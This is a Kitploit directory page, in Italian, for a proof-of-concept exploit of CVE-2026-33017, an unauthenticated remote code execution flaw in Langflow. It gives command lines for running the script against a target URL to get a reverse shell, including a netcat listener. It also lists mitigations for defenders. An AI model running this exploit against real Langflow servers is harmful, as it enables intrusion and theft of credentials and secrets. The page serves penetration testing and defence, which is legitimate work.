Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-33017-Langflop — CVE-2026-33017 PoC RCE Langflow | Kitploit
Strumenti/GitHubGitHub/tatosec/cve-2026-33017-langflop
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingSviluppo Payload
GitHubtatosec/cve-2026-33017-langflop

CVE-2026-33017-Langflop

CVE-2026-33017 PoC RCE Langflow

Vedi Repository
31 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-33017 Langflow ("Langflop") PoC di RCE non autenticata

PoC per la falla di esecuzione di codice non autenticata build_public_tmp in Langflow. Carica un componente dannoso in un flusso pubblico, attiva una build e cattura una reverse shell.

Solo per test di sicurezza autorizzati. Utilizza esclusivamente su sistemi che possiedi o per i quali hai esplicita autorizzazione al test.

Requisiti

  • Python 3
  • requests (pip install requests)

Utilizzo

Avvia il listener integrato e lancia l'exploit in un colpo solo:

root@kitploit:~
python3 poc.py \
  --url https://target:7860 \
  --flow-id <public-flow-uuid> \
  --lhost <your-ip> \
  --lport 4444 \
  --listen

Quando la shell si connette, tenta automaticamente di effettuare l'upgrade a una shell completamente interattiva.

Se preferisci usare il tuo listener (es. nc -lvnp 4444), rimuovi --listen:

Scarica lo strumento
root@kitploit:~
python3 poc.py --url https://target:7860 --flow-id <uuid> --lhost <your-ip> --lport 4444

Opzioni

FlagDescrizione
--urlURL del server Langflow di destinazione (obbligatorio)
--flow-idUUID del flusso pubblico condiviso (obbligatorio)
--lhostIP per il callback della reverse shell (obbligatorio)
--lportPorta per il callback della reverse shell (obbligatorio)
--listenAvvia il listener integrato
--timeoutTimeout delle richieste HTTP in secondi (di default 30)
-k, --insecureDisabilita la verifica dei certificati TLS (certificati self-signed / scaduti)
--no-upgradeSalta l'upgrade automatico a TTY, usa una shell a riga di comando di base

Informazioni

CVE-2026-33017 è una RCE non autenticata nell'endpoint POST /api/v1/build_public_tmp/{flow_id}/flow di Langflow, che esegue Python fornito dall'attaccante dalle definizioni dei nodi del flusso senza sandbox. Per saperne di più consulta le risorse seguenti:

  • Sysdig Threat Research writeup: CVE-2026-33017: Come gli attaccanti hanno compromesso le pipeline AI di Langflow in 20 ore
  • NVD: CVE-2026-33017

Raccomandazioni (Difensori)

Mitigazioni tratte dal report di Sysdig Threat Research:

  • Aggiorna Langflow immediatamente. Se una versione patchata non è ancora disponibile, limita l'accesso di rete all'endpoint /api/v1/build_public_tmp o disabilita completamente la creazione di flussi pubblici.
  • Controlla le variabili d'ambiente e i segreti su qualsiasi istanza Langflow esposta pubblicamente. Ruota chiavi API, password del database e credenziali cloud come precauzione.
  • Monitora le connessioni verso l'esterno su porte insolite o servizi di callback noti (oastify.com, interact.sh, dnslog.cn), che indicano sfruttamento attivo ed esfiltrazione di dati.
  • Limita l'accesso di rete alle istanze Langflow usando regole firewall o un reverse proxy con autenticazione. !!Langflow non dovrebbe essere esposto direttamente a Internet senza un livello di autenticazione!!
  • Fai l'inventario degli strumenti AI/ML nel tuo ambiente. Piattaforme come Langflow, n8n e altri strumenti di automazione dei flussi di lavoro sono sempre più prese di mira perché spesso girano con ampio accesso API e vengono distribuite al di fuori dei processi standard di revisione della sicurezza.

Disclaimer

Questo strumento è fornito per ricerca e test di penetrazione autorizzati. L'autore non si assume alcuna responsabilità per usi impropri o danni.